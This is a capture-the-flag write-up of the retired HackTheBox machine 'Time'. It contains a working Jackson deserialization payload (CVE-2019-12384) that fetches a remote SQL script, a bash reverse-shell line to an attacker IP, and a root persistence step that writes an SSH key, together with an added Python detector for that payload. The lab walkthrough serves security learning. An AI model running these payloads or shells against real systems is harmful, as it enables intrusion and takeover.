Hackthebox - Time

Summary

Time, a Linux box created by HackTheBox users egotisticalSW & felamos, was a medium difficulty box. The initial foothold was finding and exploiting a CVE in fasterxml.jackson; using that, we get a shell as pericles, the user of the box, and can grab user.txt. Running Linpeas, we find timer_backup.sh; editing that, we get code execution as root.

Enumeration

nmap

# Nmap 7.80 scan initiated Sun Oct 25 11:33:50 2020 as: nmap -sC -sV -oN nmap/time 10.10.10.214
Nmap scan report for 10.10.10.214
Host is up (0.078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 25 11:34:02 2020 -- 1 IP address (1 host up) scanned in 11.75 seconds

Web (80)

Viewing the page, we see that it is a JSON Beautifier and Validator.

Trying Validation, we get:

Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

So we know this is fasterxml.jackson. Googling around, we find CVE-2019-12384 and a PoC.

So I created an inject.sql

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.X/4444 0>&1')

and sent this as a payload

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.x:8000/inject.sql'"}]

and we get a shell as

and we can grab user.txt
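One way to flag this payload shape in logged request bodies, added here as an example (not code from the original write-up): it looks for the As.WRAPPER_ARRAY type-id form named in the error message and for an H2 JDBC URL carrying INIT=RUNSCRIPT. The function names, finding labels and sample bodies are assumptions constructed for illustration.

```python
import json
import re

# Fully-qualified Java class name: the type id Jackson reads in As.WRAPPER_ARRAY form.
FQCN = re.compile(r"^(?:[a-z_][a-z0-9_]*\.)+[A-Z_$][A-Za-z0-9_$]*$")
# H2 JDBC URL whose INIT option makes the database run a script on connect.
H2_INIT = re.compile(r"jdbc:h2:.*?;\s*INIT\s*=\s*RUNSCRIPT\b", re.I | re.S)


def walk(node):
    """Yield every value nested anywhere in a decoded JSON document."""
    yield node
    if isinstance(node, dict):
        node = list(node.values())
    if isinstance(node, list):
        for child in node:
            yield from walk(child)


def inspect_body(body):
    """Return sorted findings for one request body; an empty list means clean."""
    try:
        doc = json.loads(body)
    except ValueError:
        # Not valid JSON: fall back to a raw-text check so malformed probes still show up.
        return ["h2-init-runscript"] if H2_INIT.search(body) else []
    findings = set()
    for node in walk(doc):
        # Wrapper-array shape ["<class name>", {...properties...}]; narrowed to object values.
        if (isinstance(node, list) and len(node) == 2 and isinstance(node[0], str)
                and isinstance(node[1], dict) and FQCN.match(node[0])):
            findings.add("typed-wrapper-array:" + node[0])
        elif isinstance(node, str) and H2_INIT.search(node):
            findings.add("h2-init-runscript")
    return sorted(findings)


# Constructed sample bodies; 192.0.2.10 is a documentation address, not from the page.
SAMPLES = [
    '{"name": "test", "tags": ["a", "b"]}',
    '["hello", {"a": 1}]',
    '["ch.qos.logback.core.db.DriverManagerConnectionSource", '
    '{"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;'
    'INIT=RUNSCRIPT FROM \'http://192.0.2.10/x.sql\'"}]',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body) or "clean", "<-", body[:50])
```

The wrapper-array finding alone only shows that a client is supplying a class name; seeing it together with the H2 INIT=RUNSCRIPT finding is what matches the payload above.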

Privilege Escalation

Running linpeas.sh we find something interesting

/usr/bin/timer_backup.sh

So I edited timer_backup.sh to give a reverse shell, but that was not getting me a stable shell. To get a proper stable shell, as soon as I got a shell I ran

echo "ssh-rsa <public-key>" > /root/.ssh/authorized_keys

to write a public key to the server's authorized_keys, then used the private key to get an SSH session as root and grabbed root.txt.

and we have pwned Time 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/time/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.